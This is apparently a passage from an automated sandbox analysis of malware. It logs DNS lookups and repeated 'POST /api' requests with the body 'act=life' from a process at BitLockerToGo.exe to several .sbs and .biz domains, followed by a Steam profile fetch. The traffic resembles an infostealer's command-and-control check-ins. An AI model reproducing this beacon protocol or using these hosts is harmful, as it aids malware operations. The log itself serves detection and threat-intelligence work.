                                                                                                                                                        Oct 13, 2024 01:43:23.711344004 CEST1.1.1.1192.168.2.60xa1f3No error (0)ehticsprocw.sbs104.21.30.221A (IP address)IN (0x0001)false
                                                                                                                                                        Oct 13, 2024 01:43:24.714705944 CEST1.1.1.1192.168.2.60x5ea1No error (0)condifendteu.sbs104.21.79.35A (IP address)IN (0x0001)false
                                                                                                                                                        Oct 13, 2024 01:43:24.714705944 CEST1.1.1.1192.168.2.60x5ea1No error (0)condifendteu.sbs172.67.141.136A (IP address)IN (0x0001)false
                                                                                                                                                        Oct 13, 2024 01:43:25.719238043 CEST1.1.1.1192.168.2.60x5815No error (0)drawwyobstacw.sbs188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                        Oct 13, 2024 01:43:25.719238043 CEST1.1.1.1192.168.2.60x5815No error (0)drawwyobstacw.sbs188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                        Oct 13, 2024 01:43:27.376036882 CEST1.1.1.1192.168.2.60xd013No error (0)steamcommunity.com104.102.49.254A (IP address)IN (0x0001)false
                                                                                                                                                        Oct 13, 2024 01:43:28.824029922 CEST1.1.1.1192.168.2.60xcfdcNo error (0)sergei-esenin.com172.67.206.204A (IP address)IN (0x0001)false
                                                                                                                                                        Oct 13, 2024 01:43:28.824029922 CEST1.1.1.1192.168.2.60xcfdcNo error (0)sergei-esenin.com104.21.53.8A (IP address)IN (0x0001)false

                                                                                                                                                        HTTP Request Dependency Graph

                                                                                                                                                        • divewanntwj.biz
                                                                                                                                                        • mathcucom.sbs
                                                                                                                                                        • enlargkiw.sbs
                                                                                                                                                        • resinedyw.sbs
                                                                                                                                                        • vennurviot.sbs
                                                                                                                                                        • ehticsprocw.sbs
                                                                                                                                                        • condifendteu.sbs
                                                                                                                                                        • drawwyobstacw.sbs
                                                                                                                                                        • steamcommunity.com
                                                                                                                                                        • sergei-esenin.com

                                                                                                                                                        HTTPS Proxied Packets

                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        0192.168.2.649763188.114.97.34433784C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        2024-10-12 23:43:19 UTC262OUTPOST /api HTTP/1.1
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                        Content-Length: 8
                                                                                                                                                        Host: divewanntwj.biz
                                                                                                                                                        2024-10-12 23:43:19 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                                        Data Ascii: act=life
                                                                                                                                                        2024-10-12 23:43:19 UTC819INHTTP/1.1 200 OK
                                                                                                                                                        Date: Sat, 12 Oct 2024 23:43:19 GMT
                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                        Connection: close
                                                                                                                                                        Set-Cookie: PHPSESSID=j0to4qdfgh87nlt1h2vfd43ml2; expires=Wed, 05 Feb 2025 17:29:58 GMT; Max-Age=9999999; path=/
                                                                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        cf-cache-status: DYNAMIC
                                                                                                                                                        vary: accept-encoding
                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ANGLZ7qiqKXtsBGm2FARb3ZQbVVdfQhhi4LDgSsBV9p6NidLa7ALCqxSgcdcvR3DiqEUv%2F8fd6XybJ%2Bmi16MdTiUd88uvlv4zQArtSvtBoeDdmO9sK5rGt2A5qIr7sOB74k%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                        Server: cloudflare
                                                                                                                                                        CF-RAY: 8d1af390bd2142ef-EWR
                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                        2024-10-12 23:43:19 UTC15INData Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a
                                                                                                                                                        Data Ascii: aerror #D12
                                                                                                                                                        2024-10-12 23:43:19 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                        Data Ascii: 0


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        1192.168.2.649774188.114.97.34433784C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        2024-10-12 23:43:20 UTC260OUTPOST /api HTTP/1.1
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                        Content-Length: 8
                                                                                                                                                        Host: mathcucom.sbs
                                                                                                                                                        2024-10-12 23:43:20 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                                        Data Ascii: act=life
                                                                                                                                                        2024-10-12 23:43:20 UTC825INHTTP/1.1 200 OK
                                                                                                                                                        Date: Sat, 12 Oct 2024 23:43:20 GMT
                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                        Connection: close
                                                                                                                                                        Set-Cookie: PHPSESSID=nll1hfd8gpas51cgq0b8br4pba; expires=Wed, 05 Feb 2025 17:29:59 GMT; Max-Age=9999999; path=/
                                                                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        cf-cache-status: DYNAMIC
                                                                                                                                                        vary: accept-encoding
                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rJLj3FsseP5k4dXFR22%2BbFldrOZjD%2BZJw8ho%2FyWPvRz5w%2FKD%2BnbV6Ls9%2Ba5uJdSoYR3NXj0i5UU3aJvtuEeUt8CMXMqF1vLFhXQpHRrwxXo6t%2F8lQ%2F5ebSJrNlzu1Mix"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                        Server: cloudflare
                                                                                                                                                        CF-RAY: 8d1af396dc022369-EWR
                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                        2024-10-12 23:43:20 UTC15INData Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a
                                                                                                                                                        Data Ascii: aerror #D12
                                                                                                                                                        2024-10-12 23:43:20 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                        Data Ascii: 0


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        2192.168.2.649780104.21.33.2494433784C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        2024-10-12 23:43:21 UTC260OUTPOST /api HTTP/1.1
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                        Content-Length: 8
                                                                                                                                                        Host: enlargkiw.sbs
                                                                                                                                                        2024-10-12 23:43:21 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                                        Data Ascii: act=life
                                                                                                                                                        2024-10-12 23:43:21 UTC817INHTTP/1.1 200 OK
                                                                                                                                                        Date: Sat, 12 Oct 2024 23:43:21 GMT
                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                        Connection: close
                                                                                                                                                        Set-Cookie: PHPSESSID=etr7faknc8avg39cfckopqo8e4; expires=Wed, 05 Feb 2025 17:30:00 GMT; Max-Age=9999999; path=/
                                                                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        cf-cache-status: DYNAMIC
                                                                                                                                                        vary: accept-encoding
                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ABBajZ%2BnrvsWrqStFdN4GVgG5%2Fh5VSSm1BUdetrLHWykn4dWKOHEFM%2F0eFjLLHeAgcTrH6d6kP%2BLEDFGeQtXtEV8Kxb4C54QCHLkcihKT2n86wlGAkQBGyloXIINdt6V"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                        Server: cloudflare
                                                                                                                                                        CF-RAY: 8d1af39e5f0f423d-EWR
                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                        2024-10-12 23:43:21 UTC15INData Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a
                                                                                                                                                        Data Ascii: aerror #D12
                                                                                                                                                        2024-10-12 23:43:21 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                        Data Ascii: 0


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        3192.168.2.649790104.21.77.784433784C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        2024-10-12 23:43:22 UTC260OUTPOST /api HTTP/1.1
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                        Content-Length: 8
                                                                                                                                                        Host: resinedyw.sbs
                                                                                                                                                        2024-10-12 23:43:22 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                                        Data Ascii: act=life
                                                                                                                                                        2024-10-12 23:43:22 UTC821INHTTP/1.1 200 OK
                                                                                                                                                        Date: Sat, 12 Oct 2024 23:43:22 GMT
                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                        Connection: close
                                                                                                                                                        Set-Cookie: PHPSESSID=9lbu4p8lpoo8jmaja27iuaueo6; expires=Wed, 05 Feb 2025 17:30:01 GMT; Max-Age=9999999; path=/
                                                                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        cf-cache-status: DYNAMIC
                                                                                                                                                        vary: accept-encoding
                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GILYeplkr%2Ffp9xXt8GsB2lq%2FcQ2TFd8Z2dFHOUG8rc9%2FI%2BqKX%2Fw1BUUxkVIsiF1bXnSItNIkP2HTKuX18McdOWMqfzOtvxPDcViXqjR7nsGc%2BfnL5Ya9ydlACc27JvnU"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                        Server: cloudflare
                                                                                                                                                        CF-RAY: 8d1af3a4bdb3c3ff-EWR
                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                        2024-10-12 23:43:22 UTC15INData Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a
                                                                                                                                                        Data Ascii: aerror #D12
                                                                                                                                                        2024-10-12 23:43:22 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                        Data Ascii: 0


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        4192.168.2.649799172.67.140.1934433784C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        2024-10-12 23:43:23 UTC261OUTPOST /api HTTP/1.1
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                        Content-Length: 8
                                                                                                                                                        Host: vennurviot.sbs
                                                                                                                                                        2024-10-12 23:43:23 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                                        Data Ascii: act=life
                                                                                                                                                        2024-10-12 23:43:23 UTC825INHTTP/1.1 200 OK
                                                                                                                                                        Date: Sat, 12 Oct 2024 23:43:23 GMT
                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                        Connection: close
                                                                                                                                                        Set-Cookie: PHPSESSID=hmvh15q522frff2ilt1g2m5bkl; expires=Wed, 05 Feb 2025 17:30:02 GMT; Max-Age=9999999; path=/
                                                                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        cf-cache-status: DYNAMIC
                                                                                                                                                        vary: accept-encoding
                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CsPzjr3kFO5za8X7bCtDlcYrZmxf%2ByAifNtlxKcYTWQw8RPxRe1Tka2A881G5O1d65IlHoot7vW%2B0wdl%2BNaLlT82N3HVamB8h0rBER%2BzQCcWVkBugasNMG65qpITOnSR3A%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                        Server: cloudflare
                                                                                                                                                        CF-RAY: 8d1af3aad96d9e02-EWR
                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                        2024-10-12 23:43:23 UTC15INData Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a
                                                                                                                                                        Data Ascii: aerror #D12
                                                                                                                                                        2024-10-12 23:43:23 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                        Data Ascii: 0


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        5192.168.2.649806172.67.173.2244433784C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        2024-10-12 23:43:24 UTC262OUTPOST /api HTTP/1.1
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                        Content-Length: 8
                                                                                                                                                        Host: ehticsprocw.sbs
                                                                                                                                                        2024-10-12 23:43:24 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                                        Data Ascii: act=life
                                                                                                                                                        2024-10-12 23:43:24 UTC817INHTTP/1.1 200 OK
                                                                                                                                                        Date: Sat, 12 Oct 2024 23:43:24 GMT
                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                        Connection: close
                                                                                                                                                        Set-Cookie: PHPSESSID=0qcmi8n5bv4jbld1j9jt7kj096; expires=Wed, 05 Feb 2025 17:30:03 GMT; Max-Age=9999999; path=/
                                                                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        cf-cache-status: DYNAMIC
                                                                                                                                                        vary: accept-encoding
                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QAVfFbCi1TEnRXa8Vmwh5mFFPAOI0Z3aBTd%2BEA18hiRiT1o7x8z5XFENm69z8VxYdJWga8SFBHlA85YgCpeoqEQshoL6FxdzsMh9o0bn30adxwMbzD3WFbwj8SjNABndGWc%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                        Server: cloudflare
                                                                                                                                                        CF-RAY: 8d1af3b10e7441e3-EWR
                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                        2024-10-12 23:43:24 UTC15INData Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a
                                                                                                                                                        Data Ascii: aerror #D12
                                                                                                                                                        2024-10-12 23:43:24 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                        Data Ascii: 0


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        6192.168.2.649813104.21.79.354433784C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        2024-10-12 23:43:25 UTC263OUTPOST /api HTTP/1.1
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                        Content-Length: 8
                                                                                                                                                        Host: condifendteu.sbs
                                                                                                                                                        2024-10-12 23:43:25 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                                        Data Ascii: act=life
                                                                                                                                                        2024-10-12 23:43:25 UTC817INHTTP/1.1 200 OK
                                                                                                                                                        Date: Sat, 12 Oct 2024 23:43:25 GMT
                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                        Connection: close
                                                                                                                                                        Set-Cookie: PHPSESSID=1cn6gq7irau5vldv6iu3l8ppao; expires=Wed, 05 Feb 2025 17:30:04 GMT; Max-Age=9999999; path=/
                                                                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        cf-cache-status: DYNAMIC
                                                                                                                                                        vary: accept-encoding
                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zIihhNuCvjr3JcQnwJRLyeQHck%2FpHeoxs8BUhWRdou8vScVKOjPVuJTX86fp6Sge9DUqyoHkQDK9DHUQF0Eg8yqWFc9sXqiFFIGKxhjC7Oyex86OMY9L%2B2tYrfybZWJK5H5e"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                        Server: cloudflare
                                                                                                                                                        CF-RAY: 8d1af3b72f405e7e-EWR
                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                        2024-10-12 23:43:25 UTC15INData Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a
                                                                                                                                                        Data Ascii: aerror #D12
                                                                                                                                                        2024-10-12 23:43:25 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                        Data Ascii: 0


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        7192.168.2.649819188.114.96.34433784C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        2024-10-12 23:43:26 UTC264OUTPOST /api HTTP/1.1
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                        Content-Length: 8
                                                                                                                                                        Host: drawwyobstacw.sbs
                                                                                                                                                        2024-10-12 23:43:26 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                                        Data Ascii: act=life
                                                                                                                                                        2024-10-12 23:43:27 UTC833INHTTP/1.1 200 OK
                                                                                                                                                        Date: Sat, 12 Oct 2024 23:43:26 GMT
                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                        Connection: close
                                                                                                                                                        Set-Cookie: PHPSESSID=s17h8heelj9jurn39bo7jeonll; expires=Wed, 05 Feb 2025 17:30:05 GMT; Max-Age=9999999; path=/
                                                                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        cf-cache-status: DYNAMIC
                                                                                                                                                        vary: accept-encoding
                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cYIXq3UBLtVDK1G%2F%2BXdaCcQHbkvQxSnk6x6k1X444FS74PSe1mnYkhvqEOduDRzEFY%2F%2BnO6uTilNkqcrvkyGT%2BsCmLSFbRgVfALR1pzW%2BuX7rJWOS8mFsI3pnKrESBSIs8NHOw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                        Server: cloudflare
                                                                                                                                                        CF-RAY: 8d1af3bd583242d7-EWR
                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                        2024-10-12 23:43:27 UTC15INData Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a
                                                                                                                                                        Data Ascii: aerror #D12
                                                                                                                                                        2024-10-12 23:43:27 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                        Data Ascii: 0


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        8192.168.2.649826104.102.49.2544433784C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        2024-10-12 23:43:28 UTC219OUTGET /profiles/76561199724331900 HTTP/1.1
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                        Host: steamcommunity.com
                                                                                                                                                        2024-10-12 23:43:28 UTC1870INHTTP/1.1 200 OK
                                                                                                                                                        Server: nginx
                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                        Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED]
                                                                                                                                                        Expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Date: Sat, 12 Oct 2024 23:43:28 GMT
                                                                                                                                                        Content-Length: 34837
                                                                                                                                                        Connection: close
                                                                                                                                                        Set-Cookie: sessionid=635f6df559947daae0aecb1d; Path=/; Secure; SameSite=None
                                                                                                                                                        Set-Cookie: steamCountry=US%7Cd7fb65801182a5f50a3169fe2a0b7ef0; Path=/; Secure; HttpOnly; SameSite=None
                                                                                                                                                        2024-10-12 23:43:28 UTC14514INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0d 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0d 0a 09 09 3c
                                                                                                                                                        Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><
                                                                                                                                                        2024-10-12 23:43:28 UTC16384INData Raw: 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0d 0a 09 09 6a 51 75 65 72 79 28 66 75 6e 63 74 69 6f 6e 28 24 29 20 7b 0d 0a 09 09 09 24 28 27 23 67 6c 6f 62 61 6c 5f 68 65 61 64 65 72 20 2e 73 75 70 65 72 6e 61 76 27 29 2e 76 5f 74 6f 6f 6c 74 69 70 28 7b 27 6c 6f 63 61 74 69 6f 6e 27 3a 27 62 6f 74 74 6f 6d 27 2c 20 27 64 65 73 74 72 6f 79 57 68 65 6e 44 6f 6e 65 27 3a 20 66 61 6c 73 65 2c 20 27 74 6f 6f 6c 74 69 70 43 6c 61 73 73 27 3a 20 27 73 75 70 65 72 6e 61 76 5f 63 6f 6e 74 65 6e 74 27 2c 20 27 6f 66 66 73 65 74 59 27 3a 2d 36 2c 20 27 6f 66 66 73 65 74 58 27 3a 20 31 2c 20 27 68 6f 72 69 7a 6f 6e 74 61 6c 53 6e 61 70 27 3a 20 34 2c 20 27 74 6f 6f 6c 74 69 70 50 61 72 65 6e 74 27 3a 20 27 23 67 6c 6f
                                                                                                                                                        Data Ascii: <script type="text/javascript">jQuery(function($) {$('#global_header .supernav').v_tooltip({'location':'bottom', 'destroyWhenDone': false, 'tooltipClass': 'supernav_content', 'offsetY':-6, 'offsetX': 1, 'horizontalSnap': 4, 'tooltipParent': '#glo
                                                                                                                                                        2024-10-12 23:43:28 UTC3768INData Raw: 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 72 6f 66 69 6c 65 5f 73 75 6d 6d 61 72 79 5f 66 6f 6f 74 65 72 22 3e 0d 0a 09 09 09 09 09 09 09 3c 73 70 61 6e 20 64 61 74 61 2d 70 61 6e 65 6c 3d 22 7b 26 71 75 6f 74 3b 66 6f 63 75 73 61 62 6c 65 26 71 75 6f 74 3b 3a 74 72 75 65 2c 26 71 75 6f 74 3b 63 6c 69 63 6b 4f 6e 41 63 74 69 76 61 74 65 26 71 75 6f 74 3b 3a 74 72 75 65 7d 22 20 63 6c 61 73 73 3d 22 77 68 69 74 65 4c 69 6e 6b 22 20 63 6c 61 73 73 3d 22 77 68 69 74 65 4c 69 6e 6b 22 3e 56 69 65 77 20 6d 6f 72 65 20 69 6e 66 6f 3c 2f 73 70 61 6e 3e 0d 0a 09 09 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 09 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 20 24 4a 28 20 66 75 6e 63 74 69 6f 6e 28 29
                                                                                                                                                        Data Ascii: <div class="profile_summary_footer"><span data-panel="{&quot;focusable&quot;:true,&quot;clickOnActivate&quot;:true}" class="whiteLink" class="whiteLink">View more info</span></div><script type="text/javascript"> $J( function()
